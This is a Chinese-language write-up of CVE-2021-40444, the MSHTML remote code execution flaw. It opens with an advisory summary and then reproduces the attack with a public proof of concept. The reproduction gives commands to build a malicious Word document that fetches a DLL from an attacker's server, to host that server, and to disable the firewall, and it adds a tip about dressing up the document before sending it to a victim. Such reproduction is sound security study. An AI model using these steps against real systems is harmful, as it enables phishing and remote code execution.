2021年9月8日,微软官方发布了MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。
1、漏洞详情:
Microsoft MSHTML远程代码执行漏洞
CVE-2021-40444
严重级别:严重 CVSS:8.8
被利用级别:检测到利用
危害:未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。
在野利用:微软表示已经发现攻击者利用此漏洞。在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档。
修复:
截止2021年09月13号,微软暂未更新补丁,但提供了临时缓解措施:在 Internet Explorer 中禁用所有 ActiveX 控件的安装。
影响版本:
包括Windows 7/8/8.1/10
Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本,覆盖面比较广泛,但是主要用于office钓鱼,谨慎打开陌生文档
2、复现:
下载POC代码,到Ubuntu测试服务器上:
https://github.com/lockedbyte/CVE-2021-40444
(关闭防火墙,否则无法回连,ubuntu关闭防火墙 ufw disable)
运行脚本,先安装lcab
Sudo apt install lcab
查看ubuntu的ip地址,等下反连回来
执行命令生成恶意word文档
python3 exploit.py generate test/calc.dll http://ubuntu
生成后保存在CVE-2021-40444/out/document.docx
启动exploit,开始侦听请求:
sudo python3 exploit.py host 80
如果启动失败可能是端口被占用,netstat查看一下80,把占用的进程kill结束一下
将恶意文档稍加渲染,发给对方
对方点击document.docx成功执行,弹出计算器
稍微分析一下,还是比较菜,不太懂,只会做个脚本小子
将ubuntu的监听关闭掉,再打开Windows机器的document.docx
会发现在Windows打开恶意文档时会显示正在发起请求,里面的POC没有详细分析待分析